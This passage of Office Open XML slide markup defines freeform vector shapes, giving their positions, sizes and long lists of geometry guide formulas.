                  <a:gd name="T4" fmla="*/ 0 w 1701"/>
                  <a:gd name="T5" fmla="*/ 0 h 194"/>
                  <a:gd name="T6" fmla="*/ 0 w 1701"/>
                  <a:gd name="T7" fmla="*/ 0 h 194"/>
                  <a:gd name="T8" fmla="*/ 0 w 1701"/>
                  <a:gd name="T9" fmla="*/ 0 h 194"/>
                  <a:gd name="T10" fmla="*/ 0 w 1701"/>
                  <a:gd name="T11" fmla="*/ 0 h 194"/>
                  <a:gd name="T12" fmla="*/ 0 w 1701"/>
                  <a:gd name="T13" fmla="*/ 0 h 194"/>
                  <a:gd name="T14" fmla="*/ 0 w 1701"/>
                  <a:gd name="T15" fmla="*/ 0 h 194"/>
                  <a:gd name="T16" fmla="*/ 0 w 1701"/>
                  <a:gd name="T17" fmla="*/ 0 h 194"/>
                  <a:gd name="T18" fmla="*/ 0 w 1701"/>
                  <a:gd name="T19" fmla="*/ 0 h 194"/>
                  <a:gd name="T20" fmla="*/ 0 w 1701"/>
                  <a:gd name="T21" fmla="*/ 0 h 194"/>
                  <a:gd name="T22" fmla="*/ 0 w 1701"/>
                  <a:gd name="T23" fmla="*/ 0 h 194"/>
                  <a:gd name="T24" fmla="*/ 0 w 1701"/>
                  <a:gd name="T25" fmla="*/ 0 h 194"/>
                  <a:gd name="T26" fmla="*/ 0 w 1701"/>
                  <a:gd name="T27" fmla="*/ 0 h 194"/>
                  <a:gd name="T28" fmla="*/ 0 w 1701"/>
                  <a:gd name="T29" fmla="*/ 0 h 194"/>
                  <a:gd name="T30" fmla="*/ 0 w 1701"/>
                  <a:gd name="T31" fmla="*/ 0 h 194"/>
                  <a:gd name="T32" fmla="*/ 0 w 1701"/>
                  <a:gd name="T33" fmla="*/ 0 h 194"/>
                  <a:gd name="T34" fmla="*/ 0 w 1701"/>
                  <a:gd name="T35" fmla="*/ 0 h 194"/>
                  <a:gd name="T36" fmla="*/ 0 w 1701"/>
                  <a:gd name="T37" fmla="*/ 0 h 194"/>
                  <a:gd name="T38" fmla="*/ 0 w 1701"/>
                  <a:gd name="T39" fmla="*/ 0 h 194"/>
                  <a:gd name="T40" fmla="*/ 0 w 1701"/>
                  <a:gd name="T41" fmla="*/ 0 h 194"/>
                  <a:gd name="T42" fmla="*/ 0 w 1701"/>
                  <a:gd name="T43" fmla="*/ 0 h 194"/>
                  <a:gd name="T44" fmla="*/ 0 w 1701"/>
                  <a:gd name="T45" fmla="*/ 0 h 194"/>
                  <a:gd name="T46" fmla="*/ 0 w 1701"/>
                  <a:gd name="T47" fmla="*/ 0 h 194"/>
                  <a:gd name="T48" fmla="*/ 0 w 1701"/>
                  <a:gd name="T49" fmla="*/ 0 h 194"/>
                  <a:gd name="T50" fmla="*/ 0 w 1701"/>
                  <a:gd name="T51" fmla="*/ 0 h 194"/>
                  <a:gd name="T52" fmla="*/ 0 w 1701"/>
                  <a:gd name="T53" fmla="*/ 0 h 194"/>
                  <a:gd name="T54" fmla="*/ 0 w 1701"/>
                  <a:gd name="T55" fmla="*/ 0 h 194"/>
                  <a:gd name="T56" fmla="*/ 0 w 1701"/>
                  <a:gd name="T57" fmla="*/ 0 h 194"/>
                  <a:gd name="T58" fmla="*/ 0 w 1701"/>
                  <a:gd name="T59" fmla="*/ 0 h 194"/>
                  <a:gd name="T60" fmla="*/ 0 w 1701"/>
                  <a:gd name="T61" fmla="*/ 0 h 194"/>
                  <a:gd name="T62" fmla="*/ 0 w 1701"/>
                  <a:gd name="T63" fmla="*/ 0 h 194"/>
                  <a:gd name="T64" fmla="*/ 0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1" name="Freeform 74"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="942" y="3793"/>
                <a:ext cx="507" cy="57"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1521"/>
                  <a:gd name="T1" fmla="*/ 0 h 173"/>
                  <a:gd name="T2" fmla="*/ 0 w 1521"/>
                  <a:gd name="T3" fmla="*/ 0 h 173"/>
                  <a:gd name="T4" fmla="*/ 0 w 1521"/>
                  <a:gd name="T5" fmla="*/ 0 h 173"/>
                  <a:gd name="T6" fmla="*/ 0 w 1521"/>
                  <a:gd name="T7" fmla="*/ 0 h 173"/>
                  <a:gd name="T8" fmla="*/ 0 w 1521"/>
                  <a:gd name="T9" fmla="*/ 0 h 173"/>
                  <a:gd name="T10" fmla="*/ 0 w 1521"/>
                  <a:gd name="T11" fmla="*/ 0 h 173"/>
                  <a:gd name="T12" fmla="*/ 0 w 1521"/>
                  <a:gd name="T13" fmla="*/ 0 h 173"/>
                  <a:gd name="T14" fmla="*/ 0 w 1521"/>
                  <a:gd name="T15" fmla="*/ 0 h 173"/>
                  <a:gd name="T16" fmla="*/ 0 w 1521"/>
                  <a:gd name="T17" fmla="*/ 0 h 173"/>
                  <a:gd name="T18" fmla="*/ 0 w 1521"/>
                  <a:gd name="T19" fmla="*/ 0 h 173"/>
                  <a:gd name="T20" fmla="*/ 0 w 1521"/>
                  <a:gd name="T21" fmla="*/ 0 h 173"/>
                  <a:gd name="T22" fmla="*/ 0 w 1521"/>
                  <a:gd name="T23" fmla="*/ 0 h 173"/>
                  <a:gd name="T24" fmla="*/ 0 w 1521"/>
                  <a:gd name="T25" fmla="*/ 0 h 173"/>
                  <a:gd name="T26" fmla="*/ 0 w 1521"/>
                  <a:gd name="T27" fmla="*/ 0 h 173"/>
                  <a:gd name="T28" fmla="*/ 0 w 1521"/>
                  <a:gd name="T29" fmla="*/ 0 h 173"/>
                  <a:gd name="T30" fmla="*/ 0 w 1521"/>
                  <a:gd name="T31" fmla="*/ 0 h 173"/>
                  <a:gd name="T32" fmla="*/ 0 w 1521"/>
                  <a:gd name="T33" fmla="*/ 0 h 173"/>
                  <a:gd name="T34" fmla="*/ 0 w 1521"/>
                  <a:gd name="T35" fmla="*/ 0 h 173"/>
                  <a:gd name="T36" fmla="*/ 0 w 1521"/>
                  <a:gd name="T37" fmla="*/ 0 h 173"/>
                  <a:gd name="T38" fmla="*/ 0 w 1521"/>
                  <a:gd name="T39" fmla="*/ 0 h 173"/>
                  <a:gd name="T40" fmla="*/ 0 w 1521"/>
                  <a:gd name="T41" fmla="*/ 0 h 173"/>
                  <a:gd name="T42" fmla="*/ 0 w 1521"/>
                  <a:gd name="T43" fmla="*/ 0 h 173"/>
                  <a:gd name="T44" fmla="*/ 0 w 1521"/>
                  <a:gd name="T45" fmla="*/ 0 h 173"/>
                  <a:gd name="T46" fmla="*/ 0 w 1521"/>
                  <a:gd name="T47" fmla="*/ 0 h 173"/>
                  <a:gd name="T48" fmla="*/ 0 w 1521"/>
                  <a:gd name="T49" fmla="*/ 0 h 173"/>
                  <a:gd name="T50" fmla="*/ 0 w 1521"/>
                  <a:gd name="T51" fmla="*/ 0 h 173"/>
                  <a:gd name="T52" fmla="*/ 0 w 1521"/>
                  <a:gd name="T53" fmla="*/ 0 h 173"/>
                  <a:gd name="T54" fmla="*/ 0 w 1521"/>
                  <a:gd name="T55" fmla="*/ 0 h 173"/>
                  <a:gd name="T56" fmla="*/ 0 w 1521"/>
                  <a:gd name="T57" fmla="*/ 0 h 173"/>
                  <a:gd name="T58" fmla="*/ 0 w 1521"/>
                  <a:gd name="T59" fmla="*/ 0 h 173"/>
                  <a:gd name="T60" fmla="*/ 0 w 1521"/>
                  <a:gd name="T61" fmla="*/ 0 h 173"/>
                  <a:gd name="T62" fmla="*/ 0 w 1521"/>
                  <a:gd name="T63" fmla="*/ 0 h 173"/>
                  <a:gd name="T64" fmla="*/ 0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2" name="Freeform 75"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="798" y="3748"/>
                <a:ext cx="507" cy="57"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1521"/>
                  <a:gd name="T1" fmla="*/ 0 h 172"/>
                  <a:gd name="T2" fmla="*/ 0 w 1521"/>
                  <a:gd name="T3" fmla="*/ 0 h 172"/>
                  <a:gd name="T4" fmla="*/ 0 w 1521"/>
                  <a:gd name="T5" fmla="*/ 0 h 172"/>
                  <a:gd name="T6" fmla="*/ 0 w 1521"/>
                  <a:gd name="T7" fmla="*/ 0 h 172"/>
                  <a:gd name="T8" fmla="*/ 0 w 1521"/>
                  <a:gd name="T9" fmla="*/ 0 h 172"/>
                  <a:gd name="T10" fmla="*/ 0 w 1521"/>
                  <a:gd name="T11" fmla="*/ 0 h 172"/>
                  <a:gd name="T12" fmla="*/ 0 w 1521"/>
                  <a:gd name="T13" fmla="*/ 0 h 172"/>
                  <a:gd name="T14" fmla="*/ 0 w 1521"/>
                  <a:gd name="T15" fmla="*/ 0 h 172"/>
                  <a:gd name="T16" fmla="*/ 0 w 1521"/>
                  <a:gd name="T17" fmla="*/ 0 h 172"/>
                  <a:gd name="T18" fmla="*/ 0 w 1521"/>
                  <a:gd name="T19" fmla="*/ 0 h 172"/>
                  <a:gd name="T20" fmla="*/ 0 w 1521"/>
                  <a:gd name="T21" fmla="*/ 0 h 172"/>
                  <a:gd name="T22" fmla="*/ 0 w 1521"/>
                  <a:gd name="T23" fmla="*/ 0 h 172"/>
                  <a:gd name="T24" fmla="*/ 0 w 1521"/>
                  <a:gd name="T25" fmla="*/ 0 h 172"/>
                  <a:gd name="T26" fmla="*/ 0 w 1521"/>
                  <a:gd name="T27" fmla="*/ 0 h 172"/>
                  <a:gd name="T28" fmla="*/ 0 w 1521"/>
                  <a:gd name="T29" fmla="*/ 0 h 172"/>
                  <a:gd name="T30" fmla="*/ 0 w 1521"/>
                  <a:gd name="T31" fmla="*/ 0 h 172"/>
                  <a:gd name="T32" fmla="*/ 0 w 1521"/>
                  <a:gd name="T33" fmla="*/ 0 h 172"/>
                  <a:gd name="T34" fmla="*/ 0 w 1521"/>
                  <a:gd name="T35" fmla="*/ 0 h 172"/>
                  <a:gd name="T36" fmla="*/ 0 w 1521"/>
                  <a:gd name="T37" fmla="*/ 0 h 172"/>
                  <a:gd name="T38" fmla="*/ 0 w 1521"/>
                  <a:gd name="T39" fmla="*/ 0 h 172"/>
                  <a:gd name="T40" fmla="*/ 0 w 1521"/>
                  <a:gd name="T41" fmla="*/ 0 h 172"/>
                  <a:gd name="T42" fmla="*/ 0 w 1521"/>
                  <a:gd name="T43" fmla="*/ 0 h 172"/>
                  <a:gd name="T44" fmla="*/ 0 w 1521"/>
                  <a:gd name="T45" fmla="*/ 0 h 172"/>
                  <a:gd name="T46" fmla="*/ 0 w 1521"/>
                  <a:gd name="T47" fmla="*/ 0 h 172"/>
                  <a:gd name="T48" fmla="*/ 0 w 1521"/>
                  <a:gd name="T49" fmla="*/ 0 h 172"/>
                  <a:gd name="T50" fmla="*/ 0 w 1521"/>
                  <a:gd name="T51" fmla="*/ 0 h 172"/>
                  <a:gd name="T52" fmla="*/ 0 w 1521"/>
                  <a:gd name="T53" fmla="*/ 0 h 172"/>
                  <a:gd name="T54" fmla="*/ 0 w 1521"/>
                  <a:gd name="T55" fmla="*/ 0 h 172"/>
                  <a:gd name="T56" fmla="*/ 0 w 1521"/>
                  <a:gd name="T57" fmla="*/ 0 h 172"/>
                  <a:gd name="T58" fmla="*/ 0 w 1521"/>
                  <a:gd name="T59" fmla="*/ 0 h 172"/>
                  <a:gd name="T60" fmla="*/ 0 w 1521"/>
                  <a:gd name="T61" fmla="*/ 0 h 172"/>
                  <a:gd name="T62" fmla="*/ 0 w 1521"/>
                  <a:gd name="T63" fmla="*/ 0 h 172"/>
                  <a:gd name="T64" fmla="*/ 0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3" name="Freeform 76"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="846" y="3194"/>
                <a:ext cx="114" cy="43"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 342"/>
                  <a:gd name="T1" fmla="*/ 0 h 131"/>
                  <a:gd name="T2" fmla="*/ 0 w 342"/>
                  <a:gd name="T3" fmla="*/ 0 h 131"/>
                  <a:gd name="T4" fmla="*/ 0 w 342"/>
                  <a:gd name="T5" fmla="*/ 0 h 131"/>
                  <a:gd name="T6" fmla="*/ 0 w 342"/>
                  <a:gd name="T7" fmla="*/ 0 h 131"/>
                  <a:gd name="T8" fmla="*/ 0 w 342"/>
                  <a:gd name="T9" fmla="*/ 0 h 131"/>
                  <a:gd name="T10" fmla="*/ 0 w 342"/>
                  <a:gd name="T11" fmla="*/ 0 h 131"/>
                  <a:gd name="T12" fmla="*/ 0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4" name="Freeform 77"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1144" y="3197"/>
                <a:ext cx="131" cy="50"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 393"/>
                  <a:gd name="T1" fmla="*/ 0 h 149"/>
                  <a:gd name="T2" fmla="*/ 0 w 393"/>
                  <a:gd name="T3" fmla="*/ 0 h 149"/>
                  <a:gd name="T4" fmla="*/ 0 w 393"/>
                  <a:gd name="T5" fmla="*/ 0 h 149"/>
                  <a:gd name="T6" fmla="*/ 0 w 393"/>
                  <a:gd name="T7" fmla="*/ 0 h 149"/>
                  <a:gd name="T8" fmla="*/ 0 w 393"/>
                  <a:gd name="T9" fmla="*/ 0 h 149"/>
                  <a:gd name="T10" fmla="*/ 0 w 393"/>
                  <a:gd name="T11" fmla="*/ 0 h 149"/>
                  <a:gd name="T12" fmla="*/ 0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5" name="Freeform 78"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1134" y="3236"/>
                <a:ext cx="144" cy="61"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 434"/>
                  <a:gd name="T1" fmla="*/ 0 h 185"/>
                  <a:gd name="T2" fmla="*/ 0 w 434"/>
                  <a:gd name="T3" fmla="*/ 0 h 185"/>
                  <a:gd name="T4" fmla="*/ 0 w 434"/>
                  <a:gd name="T5" fmla="*/ 0 h 185"/>
                  <a:gd name="T6" fmla="*/ 0 w 434"/>
                  <a:gd name="T7" fmla="*/ 0 h 185"/>
                  <a:gd name="T8" fmla="*/ 0 w 434"/>
                  <a:gd name="T9" fmla="*/ 0 h 185"/>
                  <a:gd name="T10" fmla="*/ 0 w 434"/>
                  <a:gd name="T11" fmla="*/ 0 h 185"/>
                  <a:gd name="T12" fmla="*/ 0 w 434"/>
                  <a:gd name="T13" fmla="*/ 0 h 185"/>
                  <a:gd name="T14" fmla="*/ 0 w 434"/>
                  <a:gd name="T15" fmla="*/ 0 h 185"/>
                  <a:gd name="T16" fmla="*/ 0 w 434"/>
                  <a:gd name="T17" fmla="*/ 0 h 185"/>
                  <a:gd name="T18" fmla="*/ 0 w 434"/>
                  <a:gd name="T19" fmla="*/ 0 h 185"/>
                  <a:gd name="T20" fmla="*/ 0 w 434"/>
                  <a:gd name="T21" fmla="*/ 0 h 185"/>
                  <a:gd name="T22" fmla="*/ 0 w 434"/>
                  <a:gd name="T23" fmla="*/ 0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6" name="Freeform 79"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1123" y="3092"/>
                <a:ext cx="179" cy="163"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 538"/>
                  <a:gd name="T1" fmla="*/ 0 h 489"/>
                  <a:gd name="T2" fmla="*/ 0 w 538"/>
                  <a:gd name="T3" fmla="*/ 0 h 489"/>
                  <a:gd name="T4" fmla="*/ 0 w 538"/>
                  <a:gd name="T5" fmla="*/ 0 h 489"/>
                  <a:gd name="T6" fmla="*/ 0 w 538"/>
                  <a:gd name="T7" fmla="*/ 0 h 489"/>
                  <a:gd name="T8" fmla="*/ 0 w 538"/>
                  <a:gd name="T9" fmla="*/ 0 h 489"/>
                  <a:gd name="T10" fmla="*/ 0 w 538"/>
                  <a:gd name="T11" fmla="*/ 0 h 489"/>
                  <a:gd name="T12" fmla="*/ 0 w 538"/>
                  <a:gd name="T13" fmla="*/ 0 h 489"/>
                  <a:gd name="T14" fmla="*/ 0 w 538"/>
                  <a:gd name="T15" fmla="*/ 0 h 489"/>
                  <a:gd name="T16" fmla="*/ 0 w 538"/>
                  <a:gd name="T17" fmla="*/ 0 h 489"/>
                  <a:gd name="T18" fmla="*/ 0 w 538"/>
                  <a:gd name="T19" fmla="*/ 0 h 489"/>
                  <a:gd name="T20" fmla="*/ 0 w 538"/>
                  <a:gd name="T21" fmla="*/ 0 h 489"/>
                  <a:gd name="T22" fmla="*/ 0 w 538"/>
                  <a:gd name="T23" fmla="*/ 0 h 489"/>
                  <a:gd name="T24" fmla="*/ 0 w 538"/>
                  <a:gd name="T25" fmla="*/ 0 h 489"/>
                  <a:gd name="T26" fmla="*/ 0 w 538"/>
                  <a:gd name="T27" fmla="*/ 0 h 489"/>
                  <a:gd name="T28" fmla="*/ 0 w 538"/>
                  <a:gd name="T29" fmla="*/ 0 h 489"/>
                  <a:gd name="T30" fmla="*/ 0 w 538"/>
                  <a:gd name="T31" fmla="*/ 0 h 489"/>
                  <a:gd name="T32" fmla="*/ 0 w 538"/>
                  <a:gd name="T33" fmla="*/ 0 h 489"/>
                  <a:gd name="T34" fmla="*/ 0 w 538"/>
                  <a:gd name="T35" fmla="*/ 0 h 489"/>
                  <a:gd name="T36" fmla="*/ 0 w 538"/>
                  <a:gd name="T37" fmla="*/ 0 h 489"/>
                  <a:gd name="T38" fmla="*/ 0 w 538"/>
                  <a:gd name="T39" fmla="*/ 0 h 489"/>
                  <a:gd name="T40" fmla="*/ 0 w 538"/>
                  <a:gd name="T41" fmla="*/ 0 h 489"/>
                  <a:gd name="T42" fmla="*/ 0 w 538"/>
                  <a:gd name="T43" fmla="*/ 0 h 489"/>
                  <a:gd name="T44" fmla="*/ 0 w 538"/>
                  <a:gd name="T45" fmla="*/ 0 h 489"/>
                  <a:gd name="T46" fmla="*/ 0 w 538"/>
                  <a:gd name="T47" fmla="*/ 0 h 489"/>
                  <a:gd name="T48" fmla="*/ 0 w 538"/>
                  <a:gd name="T49" fmla="*/ 0 h 489"/>
                  <a:gd name="T50" fmla="*/ 0 w 538"/>
                  <a:gd name="T51" fmla="*/ 0 h 489"/>
                  <a:gd name="T52" fmla="*/ 0 w 538"/>
                  <a:gd name="T53" fmla="*/ 0 h 489"/>
                  <a:gd name="T54" fmla="*/ 0 w 538"/>
                  <a:gd name="T55" fmla="*/ 0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7" name="Freeform 80"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="821" y="3101"/>
                <a:ext cx="197" cy="153"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 590"/>
                  <a:gd name="T1" fmla="*/ 0 h 460"/>
                  <a:gd name="T2" fmla="*/ 0 w 590"/>
                  <a:gd name="T3" fmla="*/ 0 h 460"/>
                  <a:gd name="T4" fmla="*/ 0 w 590"/>
                  <a:gd name="T5" fmla="*/ 0 h 460"/>
                  <a:gd name="T6" fmla="*/ 0 w 590"/>
                  <a:gd name="T7" fmla="*/ 0 h 460"/>
                  <a:gd name="T8" fmla="*/ 0 w 590"/>
                  <a:gd name="T9" fmla="*/ 0 h 460"/>
                  <a:gd name="T10" fmla="*/ 0 w 590"/>
                  <a:gd name="T11" fmla="*/ 0 h 460"/>
                  <a:gd name="T12" fmla="*/ 0 w 590"/>
                  <a:gd name="T13" fmla="*/ 0 h 460"/>
                  <a:gd name="T14" fmla="*/ 0 w 590"/>
                  <a:gd name="T15" fmla="*/ 0 h 460"/>
                  <a:gd name="T16" fmla="*/ 0 w 590"/>
                  <a:gd name="T17" fmla="*/ 0 h 460"/>
                  <a:gd name="T18" fmla="*/ 0 w 590"/>
                  <a:gd name="T19" fmla="*/ 0 h 460"/>
                  <a:gd name="T20" fmla="*/ 0 w 590"/>
                  <a:gd name="T21" fmla="*/ 0 h 460"/>
                  <a:gd name="T22" fmla="*/ 0 w 590"/>
                  <a:gd name="T23" fmla="*/ 0 h 460"/>
                  <a:gd name="T24" fmla="*/ 0 w 590"/>
                  <a:gd name="T25" fmla="*/ 0 h 460"/>
                  <a:gd name="T26" fmla="*/ 0 w 590"/>
                  <a:gd name="T27" fmla="*/ 0 h 460"/>
                  <a:gd name="T28" fmla="*/ 0 w 590"/>
                  <a:gd name="T29" fmla="*/ 0 h 460"/>
                  <a:gd name="T30" fmla="*/ 0 w 590"/>
                  <a:gd name="T31" fmla="*/ 0 h 460"/>
                  <a:gd name="T32" fmla="*/ 0 w 590"/>
                  <a:gd name="T33" fmla="*/ 0 h 460"/>
                  <a:gd name="T34" fmla="*/ 0 w 590"/>
                  <a:gd name="T35" fmla="*/ 0 h 460"/>
                  <a:gd name="T36" fmla="*/ 0 w 590"/>
                  <a:gd name="T37" fmla="*/ 0 h 460"/>
                  <a:gd name="T38" fmla="*/ 0 w 590"/>
                  <a:gd name="T39" fmla="*/ 0 h 460"/>
                  <a:gd name="T40" fmla="*/ 0 w 590"/>
                  <a:gd name="T41" fmla="*/ 0 h 460"/>
                  <a:gd name="T42" fmla="*/ 0 w 590"/>
                  <a:gd name="T43" fmla="*/ 0 h 460"/>
                  <a:gd name="T44" fmla="*/ 0 w 590"/>
                  <a:gd name="T45" fmla="*/ 0 h 460"/>
                  <a:gd name="T46" fmla="*/ 0 w 590"/>
                  <a:gd name="T47" fmla="*/ 0 h 460"/>
                  <a:gd name="T48" fmla="*/ 0 w 590"/>
                  <a:gd name="T49" fmla="*/ 0 h 460"/>
                  <a:gd name="T50" fmla="*/ 0 w 590"/>
                  <a:gd name="T51" fmla="*/ 0 h 460"/>
                  <a:gd name="T52" fmla="*/ 0 w 590"/>
                  <a:gd name="T53" fmla="*/ 0 h 460"/>
                  <a:gd name="T54" fmla="*/ 0 w 590"/>
                  <a:gd name="T55" fmla="*/ 0 h 460"/>
                  <a:gd name="T56" fmla="*/ 0 w 590"/>
                  <a:gd name="T57" fmla="*/ 0 h 460"/>
                  <a:gd name="T58" fmla="*/ 0 w 590"/>
                  <a:gd name="T59" fmla="*/ 0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8" name="Freeform 81"/>
              <p:cNvSpPr>
                <a:spLocks/>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0 w 185"/>
                  <a:gd name="T9" fmla="*/ 0 h 172"/>
                  <a:gd name="T10" fmla="*/ 0 w 185"/>
                  <a:gd name="T11" fmla="*/ 0 h 172"/>
                  <a:gd name="T12" fmla="*/ 0 w 185"/>
                  <a:gd name="T13" fmla="*/ 0 h 172"/>
                  <a:gd name="T14" fmla="*/ 0 w 185"/>
                  <a:gd name="T15" fmla="*/ 0 h 172"/>
                  <a:gd name="T16" fmla="*/ 0 w 185"/>
                  <a:gd name="T17" fmla="*/ 0 h 172"/>
                  <a:gd name="T18" fmla="*/ 0 w 185"/>
                  <a:gd name="T19" fmla="*/ 0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9" name="Freeform 82"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1160" y="3195"/>
                <a:ext cx="66" cy="45"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 200"/>
                  <a:gd name="T1" fmla="*/ 0 h 136"/>
                  <a:gd name="T2" fmla="*/ 0 w 200"/>
                  <a:gd name="T3" fmla="*/ 0 h 136"/>
                  <a:gd name="T4" fmla="*/ 0 w 200"/>
                  <a:gd name="T5" fmla="*/ 0 h 136"/>
                  <a:gd name="T6" fmla="*/ 0 w 200"/>
                  <a:gd name="T7" fmla="*/ 0 h 136"/>
                  <a:gd name="T8" fmla="*/ 0 w 200"/>
                  <a:gd name="T9" fmla="*/ 0 h 136"/>
                  <a:gd name="T10" fmla="*/ 0 w 200"/>
                  <a:gd name="T11" fmla="*/ 0 h 136"/>
                  <a:gd name="T12" fmla="*/ 0 w 200"/>
                  <a:gd name="T13" fmla="*/ 0 h 136"/>
                  <a:gd name="T14" fmla="*/ 0 w 200"/>
                  <a:gd name="T15" fmla="*/ 0 h 136"/>
                  <a:gd name="T16" fmla="*/ 0 w 200"/>
                  <a:gd name="T17" fmla="*/ 0 h 136"/>
                  <a:gd name="T18" fmla="*/ 0 w 200"/>
                  <a:gd name="T19" fmla="*/ 0 h 136"/>
                  <a:gd name="T20" fmla="*/ 0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0" name="Freeform 83"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="454" y="3237"/>
                <a:ext cx="443" cy="238"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1330"/>
                  <a:gd name="T1" fmla="*/ 0 h 714"/>
                  <a:gd name="T2" fmla="*/ 0 w 1330"/>
                  <a:gd name="T3" fmla="*/ 0 h 714"/>
                  <a:gd name="T4" fmla="*/ 0 w 1330"/>
                  <a:gd name="T5" fmla="*/ 0 h 714"/>
                  <a:gd name="T6" fmla="*/ 0 w 1330"/>
                  <a:gd name="T7" fmla="*/ 0 h 714"/>
                  <a:gd name="T8" fmla="*/ 0 w 1330"/>
                  <a:gd name="T9" fmla="*/ 0 h 714"/>
                  <a:gd name="T10" fmla="*/ 0 w 1330"/>
                  <a:gd name="T11" fmla="*/ 0 h 714"/>
                  <a:gd name="T12" fmla="*/ 0 w 1330"/>
                  <a:gd name="T13" fmla="*/ 0 h 714"/>
                  <a:gd name="T14" fmla="*/ 0 w 1330"/>
                  <a:gd name="T15" fmla="*/ 0 h 714"/>
                  <a:gd name="T16" fmla="*/ 0 w 1330"/>
                  <a:gd name="T17" fmla="*/ 0 h 714"/>
                  <a:gd name="T18" fmla="*/ 0 w 1330"/>
                  <a:gd name="T19" fmla="*/ 0 h 714"/>
                  <a:gd name="T20" fmla="*/ 0 w 1330"/>
                  <a:gd name="T21" fmla="*/ 0 h 714"/>
                  <a:gd name="T22" fmla="*/ 0 w 1330"/>
                  <a:gd name="T23" fmla="*/ 0 h 714"/>
                  <a:gd name="T24" fmla="*/ 0 w 1330"/>
                  <a:gd name="T25" fmla="*/ 0 h 714"/>
                  <a:gd name="T26" fmla="*/ 0 w 1330"/>
                  <a:gd name="T27" fmla="*/ 0 h 714"/>
                  <a:gd name="T28" fmla="*/ 0 w 1330"/>
                  <a:gd name="T29" fmla="*/ 0 h 714"/>
                  <a:gd name="T30" fmla="*/ 0 w 1330"/>
                  <a:gd name="T31" fmla="*/ 0 h 714"/>
                  <a:gd name="T32" fmla="*/ 0 w 1330"/>
                  <a:gd name="T33" fmla="*/ 0 h 714"/>
                  <a:gd name="T34" fmla="*/ 0 w 1330"/>
                  <a:gd name="T35" fmla="*/ 0 h 714"/>
                  <a:gd name="T36" fmla="*/ 0 w 1330"/>
                  <a:gd name="T37" fmla="*/ 0 h 714"/>
                  <a:gd name="T38" fmla="*/ 0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1" name="Freeform 84"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="510" y="3225"/>
                <a:ext cx="407" cy="239"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1220"/>
                  <a:gd name="T1" fmla="*/ 0 h 716"/>
                  <a:gd name="T2" fmla="*/ 0 w 1220"/>
                  <a:gd name="T3" fmla="*/ 0 h 716"/>
                  <a:gd name="T4" fmla="*/ 0 w 1220"/>
                  <a:gd name="T5" fmla="*/ 0 h 716"/>
                  <a:gd name="T6" fmla="*/ 0 w 1220"/>
                  <a:gd name="T7" fmla="*/ 0 h 716"/>
                  <a:gd name="T8" fmla="*/ 0 w 1220"/>
                  <a:gd name="T9" fmla="*/ 0 h 716"/>
                  <a:gd name="T10" fmla="*/ 0 w 1220"/>
                  <a:gd name="T11" fmla="*/ 0 h 716"/>
                  <a:gd name="T12" fmla="*/ 0 w 1220"/>
                  <a:gd name="T13" fmla="*/ 0 h 716"/>
                  <a:gd name="T14" fmla="*/ 0 w 1220"/>
                  <a:gd name="T15" fmla="*/ 0 h 716"/>
                  <a:gd name="T16" fmla="*/ 0 w 1220"/>
                  <a:gd name="T17" fmla="*/ 0 h 716"/>
                  <a:gd name="T18" fmla="*/ 0 w 1220"/>
                  <a:gd name="T19" fmla="*/ 0 h 716"/>
                  <a:gd name="T20" fmla="*/ 0 w 1220"/>
                  <a:gd name="T21" fmla="*/ 0 h 716"/>
                  <a:gd name="T22" fmla="*/ 0 w 1220"/>
                  <a:gd name="T23" fmla="*/ 0 h 716"/>
                  <a:gd name="T24" fmla="*/ 0 w 1220"/>
